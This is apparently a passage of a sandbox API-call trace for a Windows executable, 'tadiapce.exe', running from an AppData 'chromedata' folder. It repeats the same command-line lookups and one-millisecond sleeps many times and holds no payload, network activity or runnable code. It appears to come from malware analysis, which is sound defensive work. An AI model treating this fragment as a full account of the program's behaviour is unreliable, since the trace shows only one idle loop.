	[0061.277] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19b538*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0061.277] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0061.277] Sleep (dwMilliseconds=0x1) 
	[0061.325] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19b5c8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0061.325] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0061.325] Sleep (dwMilliseconds=0x1) 
	[0061.371] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19b658*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0061.371] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0061.371] Sleep (dwMilliseconds=0x1) 
	[0061.418] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1700f8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0061.418] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0061.419] Sleep (dwMilliseconds=0x1) 
	[0061.465] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x170188*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0061.465] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0061.465] Sleep (dwMilliseconds=0x1) 
	[0061.527] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x170218*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0061.528] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0061.528] Sleep (dwMilliseconds=0x1) 
	[0061.545] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1702a8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0061.545] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0061.545] Sleep (dwMilliseconds=0x1) 
	[0061.558] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x170338*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0061.558] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0061.558] Sleep (dwMilliseconds=0x1) 
	[0061.618] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1703c8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0061.618] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0061.618] Sleep (dwMilliseconds=0x1) 
	[0061.653] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x170458*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0061.653] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0061.653] Sleep (dwMilliseconds=0x1) 
	[0061.690] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1704e8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0061.690] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0061.690] Sleep (dwMilliseconds=0x1) 
	[0061.733] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x170578*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0061.733] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0061.733] Sleep (dwMilliseconds=0x1) 
	[0061.767] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x170608*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0061.767] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0061.767] Sleep (dwMilliseconds=0x1) 
	[0061.808] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x170698*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0061.808] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0061.808] Sleep (dwMilliseconds=0x1) 
	[0061.855] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x170728*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0061.855] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0061.855] Sleep (dwMilliseconds=0x1) 
	[0061.901] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1707b8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0061.901] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0061.901] Sleep (dwMilliseconds=0x1) 
	[0061.948] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x170848*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0061.948] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0061.948] Sleep (dwMilliseconds=0x1) 
	[0061.995] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1708d8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0061.995] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0061.995] Sleep (dwMilliseconds=0x1) 
	[0062.043] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x170968*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0062.043] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0062.043] Sleep (dwMilliseconds=0x1) 
	[0062.089] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1709f8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0062.089] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0062.089] Sleep (dwMilliseconds=0x1) 
	[0062.135] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x170a88*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0062.135] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0062.136] Sleep (dwMilliseconds=0x1) 
	[0062.175] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x170b18*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0062.175] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0062.175] Sleep (dwMilliseconds=0x1) 
	[0062.229] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x170ba8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0062.229] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0062.229] Sleep (dwMilliseconds=0x1) 
	[0062.291] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x170c38*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0062.292] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0062.292] Sleep (dwMilliseconds=0x1) 
	[0062.338] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x170cc8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0062.338] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0062.338] Sleep (dwMilliseconds=0x1) 
	[0062.372] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x170d58*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0062.372] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0062.372] Sleep (dwMilliseconds=0x1) 
	[0062.416] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x170de8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0062.416] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0062.416] Sleep (dwMilliseconds=0x1) 
	[0062.469] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x170e78*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0062.469] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0062.469] Sleep (dwMilliseconds=0x1) 
	[0062.510] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x170f08*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0062.510] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0062.510] Sleep (dwMilliseconds=0x1) 
	[0062.568] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x170f98*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0062.568] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0062.568] Sleep (dwMilliseconds=0x1) 
	[0062.604] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x171028*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0062.604] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0062.604] Sleep (dwMilliseconds=0x1) 
	[0062.650] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1710b8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0062.650] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0062.650] Sleep (dwMilliseconds=0x1) 
	[0062.698] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x171148*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0062.698] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0062.698] Sleep (dwMilliseconds=0x1) 
	[0062.744] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1711d8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0062.744] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0062.744] Sleep (dwMilliseconds=0x1) 
	[0062.791] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x171268*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0062.791] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0062.791] Sleep (dwMilliseconds=0x1) 
	[0062.837] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1712f8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0062.837] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0062.837] Sleep (dwMilliseconds=0x1) 
	[0062.880] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x171388*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0062.880] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0062.880] Sleep (dwMilliseconds=0x1) 
	[0062.915] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x171418*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0062.915] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0062.915] Sleep (dwMilliseconds=0x1) 
	[0062.978] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1714a8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0062.978] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0062.978] Sleep (dwMilliseconds=0x1) 
	[0063.025] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x171538*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0063.025] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0063.025] Sleep (dwMilliseconds=0x1) 
	[0063.103] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1715c8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0063.103] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0063.103] Sleep (dwMilliseconds=0x1) 
	[0063.149] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x171658*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0063.150] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0063.150] Sleep (dwMilliseconds=0x1) 
	[0063.214] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1716e8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0063.214] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0063.214] Sleep (dwMilliseconds=0x1) 
	[0063.264] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x171778*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0063.264] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0063.264] Sleep (dwMilliseconds=0x1) 
	[0063.305] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x171808*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0063.305] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0063.306] Sleep (dwMilliseconds=0x1) 
	[0063.352] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x171898*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0063.352] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0063.352] Sleep (dwMilliseconds=0x1) 
	[0063.399] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x171928*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0063.399] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0063.399] Sleep (dwMilliseconds=0x1) 
	[0063.431] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1719b8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0063.431] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0063.431] Sleep (dwMilliseconds=0x1) 
	[0063.468] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x171a48*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0063.468] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0063.468] Sleep (dwMilliseconds=0x1) 
	[0063.508] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x171ad8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0063.508] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0063.508] Sleep (dwMilliseconds=0x1) 
	[0063.555] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x171b68*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0063.555] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0063.555] Sleep (dwMilliseconds=0x1) 
	[0063.572] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x171bf8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0063.572] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0063.572] Sleep (dwMilliseconds=0x1) 
	[0063.605] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x171c88*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0063.605] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0063.605] Sleep (dwMilliseconds=0x1) 
	[0063.649] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x171d18*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0063.649] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0063.649] Sleep (dwMilliseconds=0x1) 
	[0063.711] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x171da8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0063.711] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0063.711] Sleep (dwMilliseconds=0x1) 
	[0063.758] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x171e38*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0063.758] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0063.758] Sleep (dwMilliseconds=0x1) 
